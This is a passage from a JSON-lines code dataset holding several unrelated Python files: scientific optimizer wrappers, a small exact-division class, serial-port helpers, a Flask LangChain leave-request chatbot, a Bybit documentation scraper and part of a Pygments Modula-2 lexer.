nlopt.AUGLAG,\n nlopt.AUGLAG_EQ,\n ]\n\n if local_method is None and method in needs_local_method:\n local_method = nlopt.LD_LBFGS\n\n if local_method is not None and method not in needs_local_method:\n raise ValueError(\n f'Method \"{method}\" does not allow a local '\n f'method. 
Please set `local_method` to None.'\n )\n\n self.local_methods = [\n nlopt.LD_VAR1,\n nlopt.LD_VAR2,\n nlopt.LD_TNEWTON_PRECOND_RESTART,\n nlopt.LD_TNEWTON_PRECOND,\n nlopt.LD_TNEWTON_RESTART,\n nlopt.LD_TNEWTON,\n nlopt.LD_LBFGS,\n nlopt.LD_SLSQP,\n nlopt.LD_CCSAQ,\n nlopt.LD_MMA,\n nlopt.LN_SBPLX,\n nlopt.LN_NELDERMEAD,\n nlopt.LN_PRAXIS,\n nlopt.LN_NEWUOA,\n nlopt.LN_NEWUOA_BOUND,\n nlopt.LN_BOBYQA,\n nlopt.LN_COBYLA,\n ]\n self.global_methods = [\n nlopt.GN_ESCH,\n nlopt.GN_ISRES,\n nlopt.GN_AGS,\n nlopt.GD_STOGO,\n nlopt.GD_STOGO_RAND,\n nlopt.G_MLSL,\n nlopt.G_MLSL_LDS,\n nlopt.GD_MLSL,\n nlopt.GD_MLSL_LDS,\n nlopt.GN_CRS2_LM,\n nlopt.GN_ORIG_DIRECT,\n nlopt.GN_ORIG_DIRECT_L,\n nlopt.GN_DIRECT,\n nlopt.GN_DIRECT_L,\n nlopt.GN_DIRECT_L_NOSCAL,\n nlopt.GN_DIRECT_L_RAND,\n nlopt.GN_DIRECT_L_RAND_NOSCAL,\n ]\n self.hybrid_methods = [nlopt.AUGLAG, nlopt.AUGLAG_EQ]\n methods = (\n self.local_methods + self.global_methods + self.hybrid_methods\n )\n\n if method not in methods:\n raise ValueError(\n f'\"{method}\" is not a valid method. Valid '\n f'methods are: {methods}'\n )\n\n self.method = method\n\n if local_method is not None and local_method not in self.local_methods:\n raise ValueError(\n f'\"{local_method}\" is not a valid method. Valid '\n f'methods are: {self.local_methods}'\n )\n\n self.local_method = local_method\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} method={self.method}\"\n # print everything that is customized\n if self.local_method is not None:\n rep += f\" local_method={self.local_method}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n if self.local_options is not None:\n rep += f\" local_options={self.local_options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n import nlopt\n\n opt = nlopt.opt(self.method, problem.dim)\n\n valid_options = [\n 'ftol_abs',\n 'ftol_rel',\n 'xtol_abs',\n 'xtol_rel',\n 'stopval',\n 'x_weights',\n 'maxeval',\n 'maxtime',\n 'initial_step',\n ]\n\n def set_options(o, options):\n for option, value in options.items():\n if option not in valid_options:\n raise ValueError(\n f'\"{option}\" is not a valid option. 
Valid '\n f'options are: {valid_options}'\n )\n getattr(o, f'set_{option}')(value)\n\n if self.local_method is not None:\n local_opt = nlopt.opt(self.local_method, problem.dim)\n set_options(local_opt, self.local_options)\n opt.set_local_optimizer(local_opt)\n\n if self.method in self.global_methods:\n check_finite_bounds(problem.ub, problem.lb)\n\n opt.set_lower_bounds(problem.lb)\n opt.set_upper_bounds(problem.ub)\n\n def nlopt_objective(x, grad):\n if grad.size > 0:\n sensi_orders = (0, 1)\n else:\n sensi_orders = (0,)\n r = problem.objective(x, sensi_orders, MODE_FUN, True)\n if grad.size > 0:\n grad[:] = r[GRAD] # note that this must be inplace\n return r[FVAL]\n\n opt.set_min_objective(nlopt_objective)\n\n set_options(opt, self.options)\n try:\n result = opt.optimize(x0)\n msg = 'Finished Successfully.'\n except (\n nlopt.RoundoffLimited,\n nlopt.ForcedStop,\n ValueError,\n RuntimeError,\n MemoryError,\n ) as e:\n result = None\n msg = str(e)\n\n optimizer_result = OptimizerResult(\n x=result,\n fval=opt.last_optimum_value(),\n message=msg,\n exitflag=opt.last_optimize_result(),\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports multiple initial guesses.\"\"\"\n import nlopt\n\n if self.method in (\n nlopt.GN_AGS,\n nlopt.GD_STOGO,\n nlopt.GD_STOGO_RAND,\n nlopt.GN_ORIG_DIRECT,\n nlopt.GN_ORIG_DIRECT_L,\n nlopt.GN_DIRECT,\n nlopt.GN_DIRECT_L,\n nlopt.GN_DIRECT_L_NOSCAL,\n nlopt.GN_DIRECT_L_RAND,\n nlopt.GN_DIRECT_L_RAND_NOSCAL,\n ):\n if x_guesses is not None and x_guesses.size > 0:\n logger.warning(\n f\"The NLopt optimizer method {self.method} does \"\n \"not support x0.\"\n )\n return False\n return True\n\n\nclass FidesOptimizer(Optimizer):\n \"\"\"\n Global/Local optimization using the trust region optimizer fides.\n\n Package Homepage: https://fides-optimizer.readthedocs.io/en/latest\n \"\"\"\n\n def __init__(\n self,\n hessian_update: Optional[\n fides.hessian_approximation.HessianApproximation\n ] = 'default',\n options: Optional[Dict] = None,\n verbose: Optional[int] = logging.INFO,\n ):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n options:\n Optimizer options.\n hessian_update:\n Hessian update strategy. If this is 'default', a hybrid\n approximation that switches from the problem.objective provided\n Hessian (approximation) to a BFGS approximation will be used\n (plain BFGS if the objective provides no Hessian).\n \"\"\"\n super().__init__()\n\n try:\n import fides\n except ImportError:\n raise OptimizerImportError(\"fides\")\n\n if (\n (hessian_update is not None)\n and (hessian_update != 'default')\n and not isinstance(\n hessian_update,\n fides.hessian_approximation.HessianApproximation,\n )\n ):\n raise ValueError(\n 'Incompatible type for hessian update. 
'\n 'Must be a HessianApproximation, '\n f'was {type(hessian_update)}.'\n )\n\n if options is None:\n options = {}\n\n self.verbose = verbose\n self.options = options\n self.hessian_update = hessian_update\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} \"\n # print everything that is customized\n if self.hessian_update is not None:\n if self.hessian_update == 'default':\n rep += f\" hessian_update={self.hessian_update}\"\n else:\n rep += (\n f\" hessian_update=\"\n f\"{self.hessian_update.__class__.__name__}\"\n )\n if self.verbose is not None:\n rep += f\" verbose={self.verbose}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n import fides\n\n if self.hessian_update == 'default':\n if not problem.objective.has_hess:\n warnings.warn(\n 'Fides is using BFGS as hessian approximation, '\n 'as the problem does not provide a Hessian. '\n 'Specify a Hessian to use a more efficient '\n 'hybrid approximation scheme.'\n )\n _hessian_update = fides.BFGS()\n else:\n _hessian_update = fides.HybridFixed()\n else:\n _hessian_update = self.hessian_update\n\n resfun = (\n _hessian_update.requires_resfun\n if _hessian_update is not None\n else False\n )\n\n args = {'mode': MODE_RES if resfun else MODE_FUN}\n\n if not problem.objective.has_grad:\n raise ValueError(\n 'Fides cannot be applied to problems '\n 'with objectives that do not support '\n 'gradient evaluation.'\n )\n\n if _hessian_update is None or (\n _hessian_update.requires_hess and not resfun\n ):\n if not problem.objective.has_hess:\n raise ValueError(\n 'Specified hessian update scheme cannot be '\n 'used with objectives that do not support '\n 'Hessian computation.'\n )\n args['sensi_orders'] = (0, 1, 2)\n else:\n args['sensi_orders'] = (0, 1)\n\n opt = fides.Optimizer(\n fun=problem.objective,\n funargs=args,\n ub=problem.ub,\n lb=problem.lb,\n verbose=self.verbose,\n hessian_update=_hessian_update,\n options=self.options,\n resfun=resfun,\n )\n\n try:\n opt.minimize(x0)\n msg = self._convert_exitflag_to_message(opt)\n except RuntimeError as err:\n msg = str(err)\n\n optimizer_result = OptimizerResult(\n x=opt.x_min,\n fval=opt.fval_min if not resfun else None,\n grad=opt.grad_min,\n hess=opt.hess,\n message=msg,\n exitflag=opt.exitflag,\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def _convert_exitflag_to_message(self, opt: fides.Optimizer):\n \"\"\"\n Convert the exitflag of a run to an informative message.\n\n Parameters\n ----------\n opt:\n The fides.Optimizer that has finished minimizing storing the\n exitflag.\n\n Returns\n -------\n An informative message on the cause of termination. 
Based on\n fides documentation.\n \"\"\"\n import fides\n\n messages = {\n fides.ExitFlag.DID_NOT_RUN: \"Optimizer did not run\",\n fides.ExitFlag.MAXITER: \"Reached maximum number of allowed iterations\",\n fides.ExitFlag.MAXTIME: \"Expected to reach maximum allowed time in next iteration\",\n fides.ExitFlag.NOT_FINITE: \"Encountered non-finite fval/grad/hess\",\n fides.ExitFlag.EXCEEDED_BOUNDARY: \"Exceeded specified boundaries\",\n fides.ExitFlag.DELTA_TOO_SMALL: \"Trust Region Radius too small to proceed\",\n fides.ExitFlag.FTOL: \"Converged according to fval difference\",\n fides.ExitFlag.XTOL: \"Converged according to x difference\",\n fides.ExitFlag.GTOL: \"Converged according to gradient norm\",\n }\n return messages.get(\n opt.exitflag, f\"exitflag={opt.exitflag} is not defined in fides.\"\n )\n","repo_name":"ICB-DCM/pyPESTO","sub_path":"pypesto/optimize/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":41918,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"10503654739","text":"from __future__ import division\n\nclass ExactDivision(float):\n def __new__(cls, value=0, denominator = None):\n if denominator:\n self = float.__new__(cls, float.__truediv__(float(value), float(denominator)))\n else:\n self = float.__new__(cls, value)\n self.numerator = value\n self.denominator = denominator\n return self\n \n def __truediv__(self, other):\n return ExactDivision(self, other)\n \n def __repr__(self):\n if self.denominator is None:\n return str(self.numerator)\n t = lambda x: isinstance(x, ExactDivision) and x.denominator is not None\n \n numerator = \"({})\".format(self.numerator) if t(self.numerator) else self.numerator\n denominator = \"({})\".format(self.denominator) if t(self.denominator) else self.denominator\n \n return \"{}/{}\".format(numerator, denominator)\n \n __str__ = __repr__\n\n\nED = ExactDivision\n\n__doc__ = \"\"\"\n>>> a = ED(8)\n>>> a\n8\n>>> a/3\n8/3\n>>> a/3/5\n(8/3)/5\n>>> round(a / 3, 3)\n2.667\n\"\"\"","repo_name":"jsbueno/intelligent_objects","sub_path":"exactdivision.py","file_name":"exactdivision.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"13175193109","text":"import glob\nimport serial\nimport time\n\ndef getPort():\n ports = glob.glob(\"/dev/tty.usbmodem*\")\n if len(ports)>0:\n return ports[0]\n return \"None\"\n\n\n\ndef getPositionString(position):\n x = (position[0]+40.0)*255.0/80.0\n y = position[1] * 255.0 / 40.0\n z = (position[2] + 35.0) * 255.0 / 80.0\n x = int(max(min(255.0, x),0.0))\n y = int(max(min(255.0, y), 0.0))\n z = int(max(min(255.0, z), 0.0))\n return \"x\"+chr(x)+\"y\"+chr(y)+\"z\"+chr(z)\n\ndef getSerialConnect():\n ser = serial.Serial(getPort(), 57600)\n print(\"connecting\")\n ready=str(ser.read(5))\n print(ready)\n return ser\n\n","repo_name":"cgarib/uArm_GUI","sub_path":"Arduino.py","file_name":"Arduino.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71414449386","text":"# recreate question 1 using python\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"drinking.csv\", index_col=0)\nalcohol = df['Alcohol']\n\nalcohol.describe()\n\nplt.hist(alcohol)\nplt.show()\n","repo_name":"kayomotunde/probability-and-statistics","sub_path":"01-Lab Exercise - Drinking Habits and Integrity of College 
Students/01_question_1.py","file_name":"01_question_1.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32030737410","text":"from flask import Flask, request, jsonify\nfrom langchain.vectorstores import FAISS\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import ConversationalRetrievalChain, ConversationChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.chains import ChatVectorDBChain\nfrom langchain.chat_models import AzureChatOpenAI\nfrom langchain.memory import ConversationBufferMemory\nimport json\nimport os\n\nos.environ[\"OPENAI_API_TYPE\"] = \"azure\"\nos.environ[\"OPENAI_API_VERSION\"] = \"\"\nos.environ[\"OPENAI_API_BASE\"] = \"\"\nos.environ[\"OPENAI_API_KEY\"] = \"\"\n\napp = Flask(__name__)\n\n'''\n{\n \"userMessage\": {\n \"user_id\": \"A15\",\n \"question\": \"I will be taking leave from Oct 18 to 25\"\n }\n}\n'''\n\n# Human: I need to apply for my annual leave. How can I do that?\n# Bot: When will you be going on leave?\n# Human: I will be taking leave from Oct 18 to 25\n# Bot: Which country will you be going to?\n# Human: I will be going to Indonesia\n# Bot: Do you need a visa letter for your travel?\n# Human: Yes I need that\n# Bot: Do you need help to setup an out of office message for your leave period?\n# Human: No I dont need that\n# Bot: Do you need to delegate your approvals to someone else during your leave period?\n# Human: Yes please delegate\n\n# I will be going on leave from Sept 2 to 3, I am going to Indonesia and I dont need a visa letter. I need help to setup an out of office message and delegate approval to Superman\n'''\n{\n \"answer\": \"Understood, you would like to delegate your approvals during your leave period. Thank you for providing all the necessary information. I will proceed with the next steps.\",\n \"country_ID\": \"ID\",\n \"delegate\": \"y\",\n \"follow_a\": \"N/A\",\n \"fromDate\": \"18/10/2022\",\n \"intent\": \"leave\",\n \"setup_office\": \"n\",\n \"toDate\": \"25/10/2022\",\n \"visa_letter\": \"y\"\n}\n'''\n\nclass Session:\n def __init__(self):\n self.embedding_model = OpenAIEmbeddings(chunk_size=10)\n self.recipe_1 = TextLoader('FD.txt').load()\n self.text_splitter_1 = CharacterTextSplitter(chunk_overlap=100)\n self.recipe_1_content = self.text_splitter_1.split_documents(self.recipe_1)\n\n self.faiss_db = FAISS.from_documents(self.recipe_1_content, self.embedding_model) \n\n self.retriever = self.faiss_db.as_retriever(search_type=\"similarity\", search_kwargs={\"k\": 4})\n\n self.llm = AzureChatOpenAI(\n temperature=0,\n deployment_name=\"gpt-4\",\n )\n\n self.memory = ConversationBufferMemory(memory_key=\"chat_history\", input_key=\"question\", return_messages=True, output_key=\"answer\")\n\n self.prompt_template = \"\"\"\n You are a helpful support chatbot having a conversation with a human.\n Follow exactly these steps:\n 1. Read and examine the context below CAREFULLY.\n 2. 
Answer the question using only the context information\n\n User Question: \n {question}\n\n Context: \n {context}\n\n Chat History: \n {chat_history}\n\n\n Please note the following carefully:\n - You need to get the country name; if the user didn't specify it, please ask.\n - You NEED TO GET ALL follow up actions (follow_a) mentioned in the context answered by user. If not, KEEP asking user. DO NOT ask other questions. \n - Get the user leave dates and capture them in fromDate and toDate. You need to get the from and to dates of the user's leave; if you don't have this info, clarify with the user.\n - if user needs a visa letter, capture that information in the visa_letter.\n - if user needs help to setup an out of office message, capture that information in the setup_office.\n - if user needs help to delegate their approval to Superman, capture that information in the delegate.\n - If you got all information you need, reply user with thanks I got all information I need and will proceed with next steps. Proceed to clear the chat_history\n - If you don't know the answer, just say you don't know. Do NOT try to make up an answer. If the question is not related to the context, politely respond that you are tuned to only answer questions that are related to the context. Use as much detail as possible when responding.\n - DO NOT reply with this: I'm sorry, but as a chatbot, I don't have personal plans or intentions.\n\n Reply in JSON format with the following information:\n answer, your answer should also mention the follow up action if any (ask one at a time) (i.e. answer)\n country ID (i.e. country_ID: ID for Indonesia, JP for Japan) \n intent (i.e. intent: leave)\n follow up action from the chatbot to human if any, reply one at a time, if not just reply with N/A (i.e. follow_a)\n user leaves date from and to: (i.e. fromDate, toDate) in this format DD/MM/YYYY. Both date from and to should be populated, if not ask user. if to date is less than from date, clarify with user.\n visa letter (i.e. visa_letter: y or n)\n need to setup office (i.e. setup_office: y or n)\n delegate their approval to Superman (i.e. 
delegate: y or n)\n \"\"\"\n\n self.QA_PROMPT = PromptTemplate(\n template=self.prompt_template, input_variables=['context', 'question', 'chat_history']\n )\n\n self.qa = ConversationalRetrievalChain.from_llm(llm=self.llm, \n chain_type=\"stuff\",\n retriever=self.retriever, \n memory=self.memory, \n combine_docs_chain_kwargs={\"prompt\": self.QA_PROMPT},\n verbose=False)\n\n self.chat_history = []\n self.first_iteration = True\n\nsessions = {}\n\n@app.route('/greet', methods=['GET'])\ndef greet():\n return jsonify({'message': 'Hi, I am the Tango Bot!'})\n\n@app.route('/ask', methods=['POST'])\ndef ask_question():\n data = request.get_json()\n print(data)\n\n #remove this\n data = data[\"userMessage\"]\n #print(data)\n\n user_id = data.get('user_id', None)\n if user_id is None:\n return jsonify({'error': 'user_id is required'}), 400\n \n if user_id not in sessions:\n sessions[user_id] = Session()\n\n session = sessions[user_id]\n\n question = data.get('question', None)\n if question is None:\n return jsonify({'error': 'question is required'}), 400\n\n chat_history = session.chat_history\n # query the chain once per request; its ConversationBufferMemory keeps\n # the running conversation, so re-invoking with the same input would\n # only duplicate cost and memory entries\n result = session.qa({\"question\": question, \"chat_history\": chat_history})\n\n chat_history.append((question, result[\"answer\"]))\n session.chat_history = chat_history\n\n session.first_iteration = False\n\n parsed_data = json.loads(result[\"answer\"])\n \n\n response_data = {\n \"answer\": parsed_data[\"answer\"],\n \"country_ID\": parsed_data[\"country_ID\"],\n \"intent\": parsed_data[\"intent\"],\n \"follow_a\": parsed_data[\"follow_a\"],\n \"fromDate\": parsed_data[\"fromDate\"],\n \"toDate\": parsed_data[\"toDate\"],\n \"visa_letter\": parsed_data[\"visa_letter\"],\n \"setup_office\": parsed_data[\"setup_office\"],\n \"delegate\": parsed_data[\"delegate\"]\n }\n\n return jsonify(response_data)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"ferrygun/MyChatBot","sub_path":"chatbot_app.py","file_name":"chatbot_app.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"4740598581","text":"import keyword\n\nimport bs4\nimport requests\n\n# pip install requests bs4\n\n# Running the script will create a bybit_doc_scraping.txt and md file in the current directory.\n\nurls = {\n 'Inverse': 'https://bybit-exchange.github.io/docs/inverse',\n 'Linear': 'https://bybit-exchange.github.io/docs/linear',\n 'Futures': 'https://bybit-exchange.github.io/docs/inverse_futures',\n # 'Spot': 'https://bybit-exchange.github.io/docs/spot',\n}\n\nrm_pathname = ['v2', 'linear', 'futures']\nrepl_pathname = {'open-api': 'private'}\n\ntype_mapping = {\n 'string': str,\n 'integer': int,\n 'int': int,\n 'number': float,\n 'bool': bool,\n}\n\ntable = {}\nwith open('bybit_doc_scraping.txt', 'w') as f:\n for cont, url in urls.items():\n r = requests.get(url)\n soup = bs4.BeautifulSoup(r.text, 'lxml')\n text = ''\n text += f'class {cont}:\\n'\n text += f' def __init__(self, request: RESTAPI._request):\\n'\n text += f' self._request = request\\n'\n text += f'\\n'\n print(text)\n f.write(text)\n\n http_request = False\n request_parameters = False\n # response_parameters = False\n desc = None\n method = None\n path = None\n params = []\n table[cont] = []\n for element in soup.select_one('body > div.page-wrapper > div.content'):\n if isinstance(element, bs4.element.Tag):\n if element.name in 
{'h1', 'h2', 'h3', }:\n # changed section\n if method and path:\n if path[0] != '/':\n path = '/' + path\n p_list = path[1:].split('/')\n for rm in rm_pathname:\n if rm in p_list:\n p_list.remove(rm)\n for k, v in repl_pathname.items():\n if k in p_list:\n idx = p_list.index(k)\n p_list[idx] = p_list[idx].replace(k, v)\n funcname = '_'.join(p_list).replace('-', '').lower()\n private = 'True' if 'private' in funcname else 'False'\n\n text = ''\n text += f' def {funcname}(\\n'\n text += f' self,\\n'\n for p, t in params:\n p = p if not keyword.iskeyword(p) else f'{p}_'\n text += f' {p}: {t.__name__}=None,\\n'\n text += f' ) -> requests.Response:\\n'\n text += f' \"\"\"\\n'\n text += f' {desc}\\n'\n text += f' \"\"\"\\n'\n text += f\" method = '{method}'\\n\"\n text += f\" path = '{path}'\\n\"\n text += f\" query = {{\\n\"\n for p, t in params:\n _p = p if not keyword.iskeyword(p) else f'{p}_'\n text += f\" '{p}': {_p},\\n\"\n text += f\" }}\\n\"\n text += f' return self._request(method, path, query, private={private})\\n'\n text += '\\n'\n print(text)\n f.write(text)\n\n table[cont] += [(funcname, method, path, desc, )]\n\n method = None\n path = None\n params.clear()\n desc = element.text\n if desc == 'Abandoned Endpoints':\n break\n elif element.name == 'p':\n if element.text == 'HTTP Request':\n http_request = True\n elif element.text == 'Request Parameters':\n request_parameters = True\n # elif element.text == 'Response Parameters':\n # response_parameters = True\n if http_request:\n if element.name == 'p':\n if element.select_one('code > span'):\n http_request = False\n strings = element.strings\n method: str = next(strings)[:-1]\n path: str = next(strings)\n if request_parameters:\n if element.name == 'table':\n request_parameters = False\n for tr in element.select('tbody > tr'):\n tr: bs4.element.Tag\n tds: list[bs4.Tag] = list(tr.select('td'))\n params.append((tds[0].text, type_mapping[tds[2].text], ))\n # if response_parameters:\n # pass\n\ntext = ''\ntext += '## Method Name ⇔ Endpoint Name Mapping\\n'\nfor cont in table:\n text += f'### {cont}\\n'\n header = ['Method Name', 'Http Method', 'Endpoint URL', 'Description', ]\n text += f\"| {' | '.join(header)} |\\n\"\n text += f\"| {' | '.join(['---'] * len(header))} |\\n\"\n for row in table[cont]:\n text += f\"| {' | '.join(row)} |\\n\"\nprint(text)\nwith open('bybit_doc_scraping.md', 'w') as f:\n f.write(text)","repo_name":"MtkN1/pybybit","sub_path":"pybybit/util/bybit_doc_scraping.py","file_name":"bybit_doc_scraping.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"}
{"seq_id":"8397769411","text":"import re\n\nfrom pygments.lexer import RegexLexer, include\nfrom pygments.util import get_bool_opt, get_list_opt\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, \\\n String, Number, Punctuation, Error\n\n__all__ = ['Modula2Lexer']\n\n\n# Multi-Dialect Modula-2 Lexer\nclass Modula2Lexer(RegexLexer):\n \"\"\"\n For `Modula-2 `_ source code.\n\n The Modula-2 lexer supports several dialects. 
By default, it operates in\n fallback mode, recognising the *combined* literals, punctuation symbols\n and operators of all supported dialects, and the *combined* reserved words\n and builtins of PIM Modula-2, ISO Modula-2 and Modula-2 R10, while not\n differentiating between library defined identifiers.\n\n To select a specific dialect, a dialect option may be passed\n or a dialect tag may be embedded into a source file.\n\n Dialect Options:\n\n `m2pim`\n Select PIM Modula-2 dialect.\n `m2iso`\n Select ISO Modula-2 dialect.\n `m2r10`\n Select Modula-2 R10 dialect.\n `objm2`\n Select Objective Modula-2 dialect.\n\n The PIM and ISO dialect options may be qualified with a language extension.\n\n Language Extensions:\n\n `+aglet`\n Select Aglet Modula-2 extensions, available with m2iso.\n `+gm2`\n Select GNU Modula-2 extensions, available with m2pim.\n `+p1`\n Select p1 Modula-2 extensions, available with m2iso.\n `+xds`\n Select XDS Modula-2 extensions, available with m2iso.\n\n\n Passing a Dialect Option via Unix Commandline Interface\n\n Dialect options may be passed to the lexer using the `dialect` key.\n Only one such option should be passed. If multiple dialect options are\n passed, the first valid option is used, any subsequent options are ignored.\n\n Examples:\n\n `$ pygmentize -O full,dialect=m2iso -f html -o /path/to/output /path/to/input`\n Use ISO dialect to render input to HTML output\n `$ pygmentize -O full,dialect=m2iso+p1 -f rtf -o /path/to/output /path/to/input`\n Use ISO dialect with p1 extensions to render input to RTF output\n\n\n Embedding a Dialect Option within a source file\n\n A dialect option may be embedded in a source file in form of a dialect\n tag, a specially formatted comment that specifies a dialect option.\n\n Dialect Tag EBNF::\n\n dialectTag :\n OpeningCommentDelim Prefix dialectOption ClosingCommentDelim ;\n\n dialectOption :\n 'm2pim' | 'm2iso' | 'm2r10' | 'objm2' |\n 'm2iso+aglet' | 'm2pim+gm2' | 'm2iso+p1' | 'm2iso+xds' ;\n\n Prefix : '!' ;\n\n OpeningCommentDelim : '(*' ;\n\n ClosingCommentDelim : '*)' ;\n\n No whitespace is permitted between the tokens of a dialect tag.\n\n In the event that a source file contains multiple dialect tags, the first\n tag that contains a valid dialect option will be used and any subsequent\n dialect tags will be ignored. Ideally, a dialect tag should be placed\n at the beginning of a source file.\n\n An embedded dialect tag overrides a dialect option set via command line.\n\n Examples:\n\n ``(*!m2r10*) DEFINITION MODULE Foobar; ...``\n Use Modula2 R10 dialect to render this source file.\n ``(*!m2pim+gm2*) DEFINITION MODULE Bazbam; ...``\n Use PIM dialect with GNU extensions to render this source file.\n\n\n Algol Publication Mode:\n\n In Algol publication mode, source text is rendered for publication of\n algorithms in scientific papers and academic texts, following the format\n of the Revised Algol-60 Language Report. 
It is activated by passing\n one of two corresponding styles as an option:\n\n `algol`\n render reserved words lowercase underline boldface\n and builtins lowercase boldface italic\n `algol_nu`\n render reserved words lowercase boldface (no underlining)\n and builtins lowercase boldface italic\n\n The lexer automatically performs the required lowercase conversion when\n this mode is activated.\n\n Example:\n\n ``$ pygmentize -O full,style=algol -f latex -o /path/to/output /path/to/input``\n Render input file in Algol publication mode to LaTeX output.\n\n\n Rendering Mode of First Class ADT Identifiers:\n\n The rendering of standard library first class ADT identifiers is controlled\n by option flag \"treat_stdlib_adts_as_builtins\".\n\n When this option is turned on, standard library ADT identifiers are rendered\n as builtins. When it is turned off, they are rendered as ordinary library\n identifiers.\n\n `treat_stdlib_adts_as_builtins` (default: On)\n\n The option is useful for dialects that support ADTs as first class objects\n and provide ADTs in the standard library that would otherwise be built-in.\n\n At present, only Modula-2 R10 supports library ADTs as first class objects\n and therefore, no ADT identifiers are defined for any other dialects.\n\n Example:\n\n ``$ pygmentize -O full,dialect=m2r10,treat_stdlib_adts_as_builtins=Off ...``\n Render standard library ADTs as ordinary library types.\n\n .. versionadded:: 1.3\n\n .. versionchanged:: 2.1\n Added multi-dialect support.\n \"\"\"\n name = 'Modula-2'\n aliases = ['modula2', 'm2']\n filenames = ['*.def', '*.mod']\n mimetypes = ['text/x-modula2']\n\n flags = re.MULTILINE | re.DOTALL\n\n tokens = {\n 'whitespace': [\n (r'\\n+', Text), # blank lines\n (r'\\s+', Text), # whitespace\n ],\n 'dialecttags': [\n # PIM Dialect Tag\n (r'\\(\\*!m2pim\\*\\)', Comment.Special),\n # ISO Dialect Tag\n (r'\\(\\*!m2iso\\*\\)', Comment.Special),\n # M2R10 Dialect Tag\n (r'\\(\\*!m2r10\\*\\)', Comment.Special),\n # ObjM2 Dialect Tag\n (r'\\(\\*!objm2\\*\\)', Comment.Special),\n # Aglet Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+aglet\\*\\)', Comment.Special),\n # GNU Extensions Dialect Tag\n (r'\\(\\*!m2pim\\+gm2\\*\\)', Comment.Special),\n # p1 Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+p1\\*\\)', Comment.Special),\n # XDS Extensions Dialect Tag\n (r'\\(\\*!m2iso\\+xds\\*\\)', Comment.Special),\n ],\n 'identifiers': [\n (r'([a-zA-Z_$][\\w$]*)', Name),\n ],\n 'prefixed_number_literals': [\n #\n # Base-2, whole number\n (r'0b[01]+(\\'[01]+)*', Number.Bin),\n #\n # Base-16, whole number\n (r'0[ux][0-9A-F]+(\\'[0-9A-F]+)*', Number.Hex),\n ],\n 'plain_number_literals': [\n #\n # Base-10, real number with exponent\n (r'[0-9]+(\\'[0-9]+)*' # integral part\n r'\\.[0-9]+(\\'[0-9]+)*' # fractional part\n r'[eE][+-]?[0-9]+(\\'[0-9]+)*', # exponent\n Number.Float),\n #\n # Base-10, real number without exponent\n (r'[0-9]+(\\'[0-9]+)*' # integral part\n r'\\.[0-9]+(\\'[0-9]+)*', # fractional part\n Number.Float),\n #\n # Base-10, whole number\n (r'[0-9]+(\\'[0-9]+)*', Number.Integer),\n ],\n 'suffixed_number_literals': [\n #\n # Base-8, whole number\n (r'[0-7]+B', Number.Oct),\n #\n # Base-8, character code\n (r'[0-7]+C', Number.Oct),\n #\n # Base-16, number\n (r'[0-9A-F]+H', Number.Hex),\n ],\n 'string_literals': [\n (r\"'(\\\\\\\\|\\\\'|[^'])*'\", String), # single quoted string\n (r'\"(\\\\\\\\|\\\\\"|[^\"])*\"', String), # double quoted string\n ],\n 'digraph_operators': [\n # Dot Product Operator\n (r'\\*\\.', Operator),\n # Array Concatenation Operator\n 
